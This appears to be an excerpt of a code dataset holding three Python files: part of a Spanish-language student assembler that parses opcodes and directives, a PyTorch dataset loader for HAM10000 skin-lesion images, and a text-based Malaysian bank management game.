'@'):\n valor_decimal = (int(operando[1:], 8))\n elif(operando[0] == '%'):\n valor_decimal = (int(operando[1:], 2))\n elif(operando[0] == '$'):\n valor_decimal = (int(operando[1:], 16))\n elif((operando[0] >= '0' and operando[0] <= '9')):\n valor_decimal = int(operando)\n return valor_decimal\n \ndef es_numerico(operando):\n operando = operando.upper()\n esNumerico = False\n for caracter in operando:\n if(caracter >= '0' and caracter <= '9' or caracter >='A' and caracter <= 'F'):\n esNumerico = True\n else:\n return False\n return esNumerico\n\ndef complementoados(numero):\n i = len(numero)-1\n complemento = ''\n \n while(i >= 0):\n bit = numero[i]\n if(bit == '1'):\n i = i - 1\n complemento = bit + complemento\n break\n complemento = bit + complemento\n i = i - 1\n \n while(i >= 0):\n bit = numero[i]\n if(bit == '1'):\n bit = '0'\n elif(bit == '0'):\n bit = '1' \n complemento = bit + complemento\n i = i - 1\n return(complemento)\n#-----------------------------------------------------------------------------------------\n# Esta funcion consiste en evaluar si una linea contiene caracteres distintos a \n# los vacios como: Tabulador y Espacio en Blanco, antes del Salto de Linea\n#-----------------------------------------------------------------------------------------\ndef evaluar_lineas_sin_contenido(linea):\n posicion = 0\n if(linea[0] == '\\n'):\n estaVacia = True\n else:\n while( linea[posicion] != '\\n' ):\n if(linea[posicion] == ' ' or linea[posicion] == '\\t'):\n estaVacia = True\n else:\n estaVacia = False\n break\n posicion += 1\n return estaVacia\n\n#-----------------------------------------------------------------------------------------\n# Esta funcion consiste en identificar si la linea es comentario o por el contrario,\n# identificar su ETIQUETA, CODIGO DE OPERACION y OPERANDO\n#-----------------------------------------------------------------------------------------\ndef evaluar_linea_ensamblador(linea, diccionario_codop, archivo_temporal, tabsim):\n global CONTLOC\n global DIR_INIC\n global lista_etiquetas\n global codigoMaquina\n global resultado_evaluacion\n \n etiqueta = ''\n codop = ''\n operando = ''\n comentario = ''\n aux = 0\n posicion = 0\n bytesTotales = 0\n valor_equ = 0\n etiquetaCompletada = False\n codopCompletado = False\n \n lista_direccionamientos = []\n\n if(linea[0] != SALTO_LINEA):\n if(linea[0] == PUNTO_COMA):\n comentario += linea\n else:\n while(len(linea) > posicion and not etiquetaCompletada):\n caracter = linea[posicion]\n if(caracter != SALTO_LINEA and caracter != ESPACIO and caracter != TABULADOR):\n etiqueta += caracter\n posicion += 1\n if(posicion >= len(linea)):\n codop = 'NULL'\n codopCompletado = True\n operando = 'NULL'\n else:\n etiquetaCompletada = True\n while(linea[posicion] == ESPACIO or linea[posicion] == TABULADOR): \n posicion +=1 \n if(caracter == '\\n'):\n codop = 'NULL'\n codopCompletado = True\n operando = 'NULL'\n if(len(etiqueta) == 0):\n etiqueta = 'NULL'\n while(len(linea) > posicion and not codopCompletado):\n caracter = linea[posicion]\n if(caracter != SALTO_LINEA and caracter != ESPACIO and caracter != TABULADOR):\n codop += caracter\n posicion += 1\n if(posicion >= len(linea)):\n operando = 'NULL'\n else:\n codopCompletado = True\n while(linea[posicion] == ESPACIO or linea[posicion] == TABULADOR): \n posicion +=1 \n caracter = linea[posicion]\n if(caracter == SALTO_LINEA):\n operando = 'NULL'\n if(len(codop) == 0):\n codop = 'NULL'\n while(len(linea) > posicion):\n caracter = linea[posicion]\n if(caracter != SALTO_LINEA):\n operando += caracter\n posicion += 1\n \n #---------------------------------------------\n # Se muestran los resultados de la evaluacion\n #--------------------------------------------- \n if(not existe_end):\n if(len(comentario) > 0):\n print('COMENTARIO')\n else: \n if(re.match(codop,'EQU',re.IGNORECASE)):\n valor_equ = resultados(etiqueta, codop, operando, diccionario_codop, lista_direccionamientos)\n else:\n bytesTotales = resultados(etiqueta, codop, operando, diccionario_codop, lista_direccionamientos)\n \n if(codop.upper() == 'EQU'):\n if(valor_equ > 65535):\n valor = format(valor_equ, '05X')\n else:\n valor = format(valor_equ, '04X')\n else:\n if(CONTLOC > 65535):\n valor = format(CONTLOC, '05X')\n else:\n valor = format(CONTLOC, '04X')\n while(4 > len(valor)):\n valor = '0'+valor\n if(etiqueta != 'NULL' and len(comentario) == 0):\n existe = False\n for etq in lista_etiquetas:\n if(etiqueta.upper() == etq.upper()):\n existe = True\n print('\\t\\t ERROR DE ETIQUETA: La etiqueta ya existe')\n break\n if(not existe):\n lista_etiquetas.append(etiqueta)\n if(re.match(codop,'EQU',re.IGNORECASE)):\n tabla_simbolos = '%s|%s\\n' %(etiqueta, valor) #ETIQUETA ABSOLUTA\n else:\n tabla_simbolos = '%s|%s\\n' %(etiqueta,valor) #ETIQUETA RELATIVA\n tabsim.write(tabla_simbolos)\n if(len(comentario) == 0):\n if(len(resultado_evaluacion) == 0):\n resultado_evaluacion = 'Error'\n if(re.match(codop,'EQU',re.IGNORECASE) and valor_equ > 0):\n if(codigoMaquina != 0):\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando, resultado_evaluacion) #VALOR EQU\n codigoMaquina = 0\n else:\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#VALOR EQU\n elif(archivo_temporal.tell() > 0):\n if(codigoMaquina!= 0):\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#CONTLOC\n codigoMaquina = 0\n else:\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#CONTLOC\n else:\n cadena = '%s|%s|%s|%s|%s\\n' %(valor,etiqueta,codop,operando,resultado_evaluacion)#DIR_INIC\n archivo_temporal.write(cadena)\n resultado_evaluacion = ''\n \n if(CONTLOC >= 0 and len(comentario) == 0):\n if(int(bytesTotales) > 0 and codop.upper() != 'EQU'):\n aux = CONTLOC\n CONTLOC += int(bytesTotales)\n print('CONTLOC = %d + %d = %d' %(aux, int(bytesTotales),CONTLOC))\n if(CONTLOC > 65535):\n print('\\t\\t ERROR DE CONTLOC: El rango valido es de 0 a 65535')\n elif(int(valor_equ) > 0 and codop.upper() != 'EQU'):\n aux = CONTLOC\n CONTLOC += int(valor_equ)\n print('CONTLOC = %d + %d = %d' %(aux, int(valor_equ),CONTLOC))\n if(CONTLOC > 65535):\n print('\\t\\t ERROR DE CONTLOC: El rango valido es de 0 a 65535')\n else:\n print('CONTLOC = %d' %CONTLOC)\n codigoMaquina = 0\n print('-'*100)\n lista_direccionamientos.clear()\n \ndef resultados(etiqueta, codop, operando, diccionario_codop, lista_direccionamientos):\n global existe_end\n global existe_org \n global DIR_INIC\n global CONTLOC\n global codigoMaquina\n global resultado_evaluacion\n \n bytesTotales = 0\n \n codopValido = False\n print('ETIQUETA = '+etiqueta)\n if(re.match(codop, 'ORG|END', re.IGNORECASE) and etiqueta != 'NULL'):\n print('\\t\\t ERROR DE DIRECTIVA: La directiva %s no debe tener etiqueta' %codop.upper())\n elif(re.match(codop, 'EQU', re.IGNORECASE) and etiqueta == 'NULL'):\n print('\\t\\t ERROR DE DIRECTIVA: La directiva %s debe tener etiqueta' %codop.upper())\n else: \n evaluar_etiqueta(etiqueta)\n print('CODOP = '+codop)\n #-------------------------------------------------------------\n \n if(re.match(codop, 'ORG', re.IGNORECASE) and existe_org):\n print('\\t\\t ERROR DE DIRECTIVA: La directiva %s solo debe existir una vez' %codop.upper())\n #Si existe END en CODOP\n if(re.match(codop, 'END', re.IGNORECASE)):\n existe_end = True\n #Se evalua el CODOP para encontrar errores\n codopTieneErrores = evaluar_codop(codop)\n \n #Si ni tiene errores, se busca si existe el codop en el tabop\n if(not codopTieneErrores):\n codopValido = existe_codop_en_tabop(codop.upper(), diccionario_codop) \n \n #------------------------------------------------------------- \n print('OPERANDO = '+operando)\n if(re.match(codop, 'ORG', re.IGNORECASE) and not existe_org):\n existe_org = True\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n DIR_INIC = validar_operando_directo_o_extendido(operando)\n if(DIR_INIC == -1): DIR_INIC = 0\n else:\n DIR_INIC = 0\n print('\\t\\t ERROR DE OPERANDO: El valor de la directiva ORG debe estar representado en Decimal, Hexadecimal, Octal o Binario y tener un rango de 0 a 65535',DIR_INIC)\n CONTLOC = DIR_INIC\n print('\\t\\t La direccion inicial es: ',DIR_INIC)\n elif(re.match(codop, 'END', re.IGNORECASE) and operando != 'NULL'):\n print('\\t\\t ERROR DE OPERANDOV: La directiva END no debe tener operando')\n elif(re.match('DB|DC.B|FCB', codop, re.IGNORECASE)):\n #---------- 0 a 255 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 255):\n bytesTotales = 1\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 255'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper())\n elif(re.match('DW|DC.W|FDB', codop, re.IGNORECASE)):\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = 2\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper())\n\n elif(re.match('FCC', codop, re.IGNORECASE)):\n if(operando == 'NULL'):\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe ser representado en cualquier caracter ASCII'%codop.upper())\n else:\n if(chr(34) not in operando):\n print('\\t\\t ERROR DE SINTAXIS: La cadena debe estar representada entre las comillas de apertura y cierre')\n else:\n if(chr(34) == operando[0]):\n if(chr(34) == (operando[len(operando)-1])):\n bytesTotales = len(operando) - 2\n else:\n print('\\t\\t ERROR DE SINTAXIS: Falta la comilla de cierre')\n else:\n print('\\t\\t ERROR DE SINTAXIS: Falta la comilla de apertura')\n elif(re.match('DS.B|RMB', codop, re.IGNORECASE) or codop.upper() == 'DS'): ##error con los re.match\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = valor * 1\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper()) \n elif(re.match('DS.W|RMW', codop, re.IGNORECASE)):\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = (valor * 2)\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper()) \n elif(re.match('EQU', codop, re.IGNORECASE)):\n #---------- 0 a 65535 ---------\n if(operando[0] == '$' or operando[0] == '%' or operando[0] == '@' or (operando[0] >= '0' and operando[0] <= '9')):\n valor = validar_operando_directo_o_extendido(operando)\n if(valor >= 0 and valor <= 65535):\n bytesTotales = valor\n else:\n print('\\t\\t ERROR DE RANGO: El operando de la directiva %s debe tener un rango de 0 a 65535'%codop.upper())\n else:\n print('\\t\\t ERROR DE OPERANDO: El operando de la directiva %s debe estar representado en Decimal, Hexadecimal, Octal o Binario'%codop.upper()) \n else:\n if(codop.upper() != 'END' and codopValido):\n totalDireccionamiento = direccionamiento_particular_tabop(codop, diccionario_codop, lista_direccionamientos)\n lista = direccionamiento_correspondiente(lista_direccionamientos, operando, CONTLOC)\n totalBytes = lista[0]\n bytesTotales = int(totalBytes)\n resultado_evaluacion = lista[1]\n if(codopValido):\n codopTieneOperando(codop.upper(), operando, diccionario_codop)\n print('DIRECCIONAMIENTO = ', totalDireccionamiento)\n return bytesTotales","sub_path":"[CC207] ~ Practica07/Ensamblador/f03_Ensamblador.py","file_name":"f03_Ensamblador.py","file_ext":"py","file_size_in_byte":33140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"316486087","text":"\"\"\"Module to parse dataset.\"\"\"\n\n# Imports.\nimport os\nfrom os.path import join\nimport glob\n\nimport pandas as pd\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# import torch\n\nfrom torch.utils.data import Dataset\n\n# import torchvision\n\nimport torchvision.transforms as transforms\n\n\ndef read_image_paths(data_dir):\n \"\"\"Read image paths from data directory.\n\n Args:\n data_dir (str): path to folder with images.\n\n Returns:\n image_paths (list): list of image paths.\n\n \"\"\"\n image_extension_pattern = '*.jpg'\n image_paths = sorted((y for x in os.walk(data_dir) for y in\n glob.glob(join(x[0], image_extension_pattern))))\n return image_paths\n\n\ndef get_image_paths_dict(data_dir):\n \"\"\"Create and return dict that maps image IDs to image paths.\n\n Args:\n data_dir (str): path to folder with images\n\n Returns:\n image_paths_dict (dict): dict to map image IDs to image paths.\n\n \"\"\"\n image_paths = read_image_paths(data_dir)\n image_paths_dict = {}\n for image_path in image_paths:\n image_id = image_path.split('/')[-1].split('.jpg')[0]\n image_paths_dict[image_id] = image_path\n\n return image_paths_dict\n\n\ndef read_meta_data(data_dir):\n \"\"\"Read meta data file using Pandas.\n\n Returns:\n meta_data (pandas.core.frame.DataFrame): meta-data object.\n\n \"\"\"\n meta_data = pd.read_csv(join(data_dir, 'HAM10000_metadata.csv'),\n index_col='image_id')\n return meta_data\n\n\ndef load_image(image_path):\n \"\"\"Load image as numpy array.\n\n Args:\n image_path (str): path to image.\n\n Returns:\n (numpy.ndarray): image as numpy array.\n\n \"\"\"\n return np.array(Image.open(image_path))\n\n\ndef show_images(images, cols=1, titles=None):\n \"\"\"Display multiple images arranged as a table.\n\n Args:\n images (list): list of images to display as numpy arrays.\n cols (int, optional): number of columns.\n titles (list, optional): list of title strings for each image.\n\n \"\"\"\n assert((titles is None)or (len(images) == len(titles)))\n n_images = len(images)\n\n if titles is None:\n titles = ['Image (%d)' % i for i in range(1, n_images + 1)]\n\n fig = plt.figure()\n\n for n, (image, title) in enumerate(zip(images, titles)):\n a = fig.add_subplot(cols, np.ceil(n_images/float(cols)), n + 1)\n if image.ndim == 2:\n plt.gray()\n plt.imshow(image)\n a.set_title(title)\n\n fig.set_size_inches(np.array(fig.get_size_inches()) * n_images)\n plt.show()\n\n\ndef create_train_val_split(data_dir,\n train_fraction, val_fraction,\n random_state=123):\n \"\"\"Split data into training and validation sets, based on given fractions.\n\n Args:\n train_fraction (float): fraction of data to use for training.\n val_fraction (float): fraction of data to use for training.\n random_state (int): seed for the random generator (for\n reproducibility).\n\n Returns:\n (tuple): tuple with training image IDs and validation image IDs.\n\n \"\"\"\n assert(train_fraction + val_fraction <= 1.0)\n\n # TODO move this somewhere else\n LABEL_COLUMN = 'dx'\n # IMAGE_ID_COLUMN = 'image_id'\n\n # TODO: Implement a proper training/validation split\n meta_data = read_meta_data(data_dir)\n\n train_ids = list()\n val_ids = list()\n\n for gg in meta_data.groupby(LABEL_COLUMN):\n # category = gg[0]\n group_df = gg[1]\n\n n = len(group_df)\n\n # Retrieve number of\n n_tr = int(n*train_fraction)\n\n # To get as much data as possible\n if (train_fraction + val_fraction == 1.0):\n n_vd = n - n_tr\n else:\n n_vd = int(n*val_fraction)\n\n # This is just used for shuffling, returns the whole group because of\n # frac=1.0\n group_ids = group_df.sample(\n frac=1.0, random_state=random_state).index.to_list()\n\n # Get ids for training and validation set\n group_ids_train = group_ids[:n_tr]\n group_ids_val = group_ids[n_tr:n_tr+n_vd]\n\n # Add ids to ids list\n train_ids.extend(group_ids_train)\n val_ids.extend(group_ids_val)\n\n return train_ids, val_ids\n\n\nclass HAM10000(Dataset):\n \"\"\"HAM10000 dataset.\n\n Attributes:\n sampling_list (list): list of image IDs to use.\n image_paths_dict (dict): dict to map image IDs to image paths.\n meta_data (pandas.core.frame.DataFrame): meta data object.\n class_map_dict (dict): dict to map label strings to label indices.\n transforms ():\n\n \"\"\"\n\n def __init__(self, data_dir, sampling_list,\n transforms=transforms.ToTensor()):\n \"\"\"Constructor.\n\n Args:\n data_dir (str): path to images and metadata file\n sampling_list (list): list of image IDs to use.\n\n \"\"\"\n self.data_dir = data_dir\n self.sampling_list = sampling_list\n self.image_paths_dict = get_image_paths_dict(self.data_dir)\n self.meta_data = read_meta_data(self.data_dir)\n self.class_map_dict = self.get_class_map_dict()\n\n self.transforms = transforms\n\n\n def get_labels(self):\n \"\"\"Get labels of dataset and return them as list.\n\n Returns:\n (list): list of all labels.\n\n \"\"\"\n labels = [self.meta_data.loc[image_id]['dx']\n for image_id in self.sampling_list]\n\n return labels\n\n def get_num_classes(self):\n \"\"\"Get number of classes.\n\n Returns:\n (int): number of classes.\n\n \"\"\"\n return len(self.class_map_dict)\n\n def get_class_map_dict(self):\n \"\"\"Get dict to map label strings to label indices.\n\n Returns:\n class_map_dict (dict): dict to map label strings to label indices.\n\n \"\"\"\n classes_list = list(\n self.meta_data.groupby('dx')['lesion_id'].nunique().keys())\n\n classes_list = sorted(classes_list)\n class_map_dict = {}\n for i, cls in enumerate(classes_list):\n class_map_dict[cls] = i\n\n return class_map_dict\n\n def __len__(self):\n \"\"\"Get size of dataset.\n\n Returns:\n (int): size of dataset, i.e. number of samples.\n\n \"\"\"\n return len(self.sampling_list)\n\n def __getitem__(self, index):\n \"\"\"Get item.\n\n Args:\n index (int): index.\n\n Returns:\n (tuple): tuple with image and label.\n\n \"\"\"\n image_id = self.sampling_list[index]\n img = Image.open(self.image_paths_dict.get(image_id))\n assert(image_id in self.meta_data.index)\n label = self.class_map_dict[self.meta_data.loc[image_id]['dx']]\n\n img = self.transforms(img)\n\n return img, label\n\n def make_weights_for_balanced_classes(self):\n \"\"\"Function used to return weights for WeightedRandomSampler\n\n Inspired by:\n https://discuss.pytorch.org/t/balanced-sampling-between-classes-with-torchvision-dataloader/2703/3\n \"\"\"\n\n count = [0] * self.get_num_classes()\n\n # label = self.class_map_dict[self.meta_data.loc[image_id]['dx']]\n labels = [self.class_map_dict[l] for l in self.get_labels()]\n\n # print(labels)\n\n # Count how many instances there are for each class\n for l in labels:\n count[l] += 1\n\n weight_per_class = [0.] * self.get_num_classes()\n\n N = float(sum(count))\n\n # Assign a weight which is inversely proportional to class frequency\n for i in range(self.get_num_classes()):\n weight_per_class[i] = N/float(count[i])\n\n # print(\"Weights per class:\")\n # print(weight_per_class)\n\n # Save results for debugging purposes\n self._weight_per_class = weight_per_class\n\n # Now assign a weight to each data point\n weight = [0] * len(labels)\n\n for idx, val in enumerate(labels):\n weight[idx] = weight_per_class[val]\n\n return weight\n","sub_path":"palladio/lib/dataset/HAM10000.py","file_name":"HAM10000.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"592690418","text":"# DEVELOPING SKILLS #\r\n# THIS GAME IS BASED ON THE BANK SYSTEM OF MALAYSIA (CURRENCY SYSTEM) #\r\n# MIGHT HAVE SOME UNSOLVED ERRORS #\r\n# Hastags are used for readability purpose #\r\n# BY PERI.R #\r\n\r\nimport random, replit, time, math\r\nfrom termcolor import cprint\r\nfrom colorama import *\r\n\r\ninit()\r\nreplit.clear()\r\n\r\n# Unrelated\r\nTimeToWork = 0\r\n\r\n# levels\r\nmoney = 10000 # Initialized the cash val\r\ngear_upgrade = 1 # Begins from level 1\r\nsecurity_upgrade = 1 # it will increment based on the options selection\r\nstaff_upgrade = 1 # it will increment based on the options selection\r\ncustomers = 10\r\n\r\n################################################################################################################\r\n\r\n# Upgrade Prices\r\ngear_upgrade_price = 1000\r\nsecurity_upgrade_price = 500\r\nstaff_upgrade_price = 250\r\nadvertise_price = 300\r\npaperwork_price = 10\r\n\r\n################################################################################################################\r\n\r\n# Move location prices\r\ncurrent_location = \"\"\r\n\r\nPenang_price = 500\r\nJohor_price = 700\r\nPahang_price = 900\r\nKedah_price = 1100\r\nPerlis_price = 1300\r\nNegeriSembilan_price = 1500\r\nKelantan_price = 1700\r\n\r\n################################################################################################################\r\n\r\n\r\n# List of locations if they choose above 4\r\nstart_locations = [\"Selangor\", \"Perak\", \"Malacca\"]\r\n\r\nprint(Fore.BLUE + \"\"\" \r\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\r\n\r\n ____ ___ _ ____ __ _ ______________ __ __ _______ __\r\n / __ )/ | / | / / //_/ | | / / _/_ __/ / / / / / / / ___/ / /\r\n / __ / /| | / |/ / ,< | | /| / // / / / / /_/ / / / / /\\__ \\ / /\r\n / /_/ / ___ |/ /| / /| | | |/ |/ // / / / / __ / / /_/ /___/ / /_/\r\n/_____/_/ |_/_/ |_/_/ |_| |__/|__/___/ /_/ /_/ /_/ \\____//____/ (_)\r\n\r\n\r\n A virtual bank that you can manage, own, and destroy.\r\n Designed By : PERI.R\r\n\r\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\r\n\r\nLoading...\r\n\"\"\" + Fore.RESET)\r\n\r\ntime.sleep(3)\r\nprint(\"To start your bank, you persuaded your family and friends to be your customers\")\r\ncprint(\"+10 Customers!\", \"red\")\r\n\r\ntime.sleep(3)\r\n\r\n################################################################################################################\r\n\r\n# START LOCATION\r\nprint(\"Now that you got customers ready, you need to find a location for your bank!\")\r\nprint(\"1. Selangor\")\r\nprint(\"2. Perak\")\r\nprint(\"3. Malacca\")\r\nchoice = input(\">> \")\r\n\r\nif choice == \"1\":\r\n print(\"You set your location as Selangor\")\r\n current_location = \"Selangor\"\r\n\r\nif choice == \"2\":\r\n print(\"You set your location as Perak\")\r\n current_location = \"Perak\"\r\n\r\nif choice == \"3\":\r\n print(\"You set your location as Malacca\")\r\n current_location = \"Malacca\"\r\n\r\nif choice >= \"4\":\r\n random_location = random.choice(start_locations)\r\n current_location = random_location\r\n print(\"You set your location as: \" + random_location)\r\n\r\ntime.sleep(2)\r\n\r\nTypesOfPeople = [\"a single mom\", \"a homeless man\", \"a war veteran\", \"a small business owner\"]\r\nTypesOfAdvertisement = [\"a Radio\", \"a TV Series\", \"a Movie Series\", \"a Social Media Site\"]\r\n\r\n\r\n################################################################################################################\r\n\r\n# THE ACTUAL PROGRAM WHERE STUFF HAPPENS\r\n\r\ndef GetToWork():\r\n replit.clear()\r\n global money, customers, gear_upgrade, staff_upgrade, security_upgrade, paperwork_price, current_location, gear_upgrade_price, security_upgrade_price, staff_upgrade_price, TimeToWork\r\n\r\n TimeToWork = TimeToWork + 1\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER!\", \"red\", attrs=[\"bold\", \"underline\"])\r\n print(\"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\"\"\")\r\n print(\"Better luck next time\")\r\n return\r\n\r\n if customers <= 0:\r\n print(Fore.RED + \"GAME OVER!\" + Fore.RESET)\r\n print(\"Your bank ran out of customers :(\")\r\n\r\n if money >= 100000:\r\n cprint(\"YOU WON! You got your bank to RM100,000\", \"green\", attrs=[\"bold\"])\r\n print(\"But however, there is a recession... so bye\")\r\n time.sleep(3)\r\n for i in range(1, money):\r\n time.sleep(0.1)\r\n money = money - 10000\r\n print(\"Your Money: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n replit.clear()\r\n\r\n if money <= 0:\r\n cprint(\"GAME OVER\", \"red\")\r\n print(Fore.GREEN + \"\"\"\r\n___________________________________\r\n|#######====================#######|\r\n|#(1)* BANK NEGARA MALAYSIA *(1)#|\r\n|#********** /===\\ **#|\r\n|*# {G} | (\") | #*|\r\n|#* O N E | /v\\ | *#|\r\n|#(1) \\===/ (1)#|\r\n|##=========ONE RINGGIT==========##|\r\n------------------------------------\"\"\" + Fore.RESET)\r\n print(\"You won, but also lost\")\r\n return\r\n\r\n ################################################################################################################\r\n\r\n # printing current stats\r\n print(\"Current Stats:\")\r\n print(\"Your Balance: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n print(\"Equipment Level: \" + str(gear_upgrade))\r\n print(\"Security Level: \" + str(security_upgrade))\r\n print(\"Staff Level: \" + str(staff_upgrade))\r\n print(\"Customers: \" + str(customers))\r\n print(\"Current Location: \" + current_location)\r\n print(\"\")\r\n print(\"You arrived at work! What do you do?\")\r\n print(\"1. Give out loans\")\r\n print(\"2. Accept advertisements\")\r\n print(\"3. Do paperwork\")\r\n print(\"4. Invest\")\r\n print(\"5. Check Donation Bin\")\r\n print(\"6. Sabotage Competition\")\r\n print(\"7. Leave work\")\r\n choice = input(\">> \")\r\n\r\n ################################################################################################################\r\n\r\n # Give out Loans\r\n if choice == \"1\":\r\n replit.clear()\r\n wantedLoan = random.randint(100, 1000)\r\n\r\n if money < wantedLoan:\r\n print(\"You don't have enough money for this!\")\r\n time.sleep(2)\r\n GetToWork()\r\n\r\n print(\r\n \"Someone walks in to your bank and asks for a loan of \" + Fore.GREEN + \"RM\" + str(wantedLoan) + Fore.RESET)\r\n print(\"Do you accept their offer?\")\r\n yn = input(\"y/n: \")\r\n if yn == \"y\":\r\n chanceOfReturn = random.randint(1, 2)\r\n money = money - wantedLoan\r\n print(\"You have given the loan of \" + Fore.RED + \"RM\" + str(wantedLoan) + Fore.RESET)\r\n print(\"Only time will tell if you get the money back\")\r\n time.sleep(5)\r\n\r\n ################################################################################################################\r\n\r\n # Get your money back (Successful Loan)\r\n if chanceOfReturn == 1:\r\n print(\"You were able to get your money back! And got paid for work!\")\r\n PaidForWork = random.randint(25, 50)\r\n total = wantedLoan + PaidForWork\r\n print(\"You just got a total of: \" + Fore.GREEN + \"RM\" + str(total) + Fore.RESET)\r\n oney = money + total\r\n print(\"Your total balance is: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(4)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # No money back\r\n if chanceOfReturn == 2:\r\n print(\"You were unable to make any money back.\")\r\n print(\"You lost: \" + Fore.RED + \"RM\" + str(wantedLoan) + Fore.RESET)\r\n time.sleep(3)\r\n GetToWork()\r\n\r\n if yn == \"n\":\r\n print(\"Alright then, no loans at this time!\")\r\n time.sleep(1)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # Accept Advertisements\r\n if choice == \"2\":\r\n TypesOfAdvertisement_chosen = random.choice(TypesOfAdvertisement)\r\n Chosen_price = random.randint(50, 100)\r\n print(\"A company has decided to use you as an advertiser!\")\r\n print(\"The company that wants you to advertise is: \" + TypesOfAdvertisement_chosen)\r\n print(\"They want to pay you: \" + Fore.GREEN + \"RM\" + str(Chosen_price) + Fore.RESET)\r\n print(\"Do you accept this offer?\")\r\n\r\n yn = input(\"y/n: \")\r\n if yn == \"y\":\r\n print(\"You just accepted the offer and got RM\" + Fore.GREEN + \"RM\" + str(Chosen_price) + Fore.RESET)\r\n money = money + Chosen_price\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(2)\r\n replit.clear()\r\n GetToWork()\r\n\r\n if yn == \"n\":\r\n print(\"You refused the offer, and didn't make any money.\")\r\n time.sleep(2)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # Do paperwork\r\n if choice == \"3\":\r\n level = gear_upgrade\r\n print(\"Doing paperwork...\")\r\n time.sleep(3)\r\n paperwork_price = paperwork_price * level\r\n money = money + paperwork_price\r\n print(\"You have earned \" + Fore.GREEN + \"RM\" + str(paperwork_price) + Fore.RESET)\r\n print(\"Your Balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(3)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # invest\r\n if choice == \"4\":\r\n bankInvestment = random.randint(50, 500)\r\n chanceOfSuccess = random.randint(1, 2)\r\n\r\n # 1 = Successful Investment\r\n # 2 = Failed Investment\r\n\r\n print(\"A company has requested that you invest in their company.\")\r\n print(\"You will give them: \" + Fore.GREEN + \"RM\" + str(bankInvestment) + Fore.RESET)\r\n print(\"Do you accept?\")\r\n yn = input(\"y/n: \")\r\n\r\n if yn == \"y\":\r\n replit.clear()\r\n print(\"You have given out the loan of \" + Fore.GREEN + \"RM\" + str(\r\n bankInvestment) + Fore.RESET + \" Only time will tell if this was good or not!\")\r\n time.sleep(3)\r\n\r\n ################################################################################################################\r\n\r\n # Successful Investment\r\n if chanceOfSuccess == 1:\r\n print(\"You made a successful investment! And you earned x2 your money!\")\r\n investment = bankInvestment * 2\r\n money = money + investment\r\n cprint(\"You earned: \" + Fore.GREEN + \"RM\" + str(investment) + Fore.RESET)\r\n print(\"Your balance is now: \" + Fore.GREEN + \"RM\" + str(money) + Fore.RESET)\r\n time.sleep(4)\r\n GetToWork()\r\n\r\n ################################################################################################################\r\n\r\n # 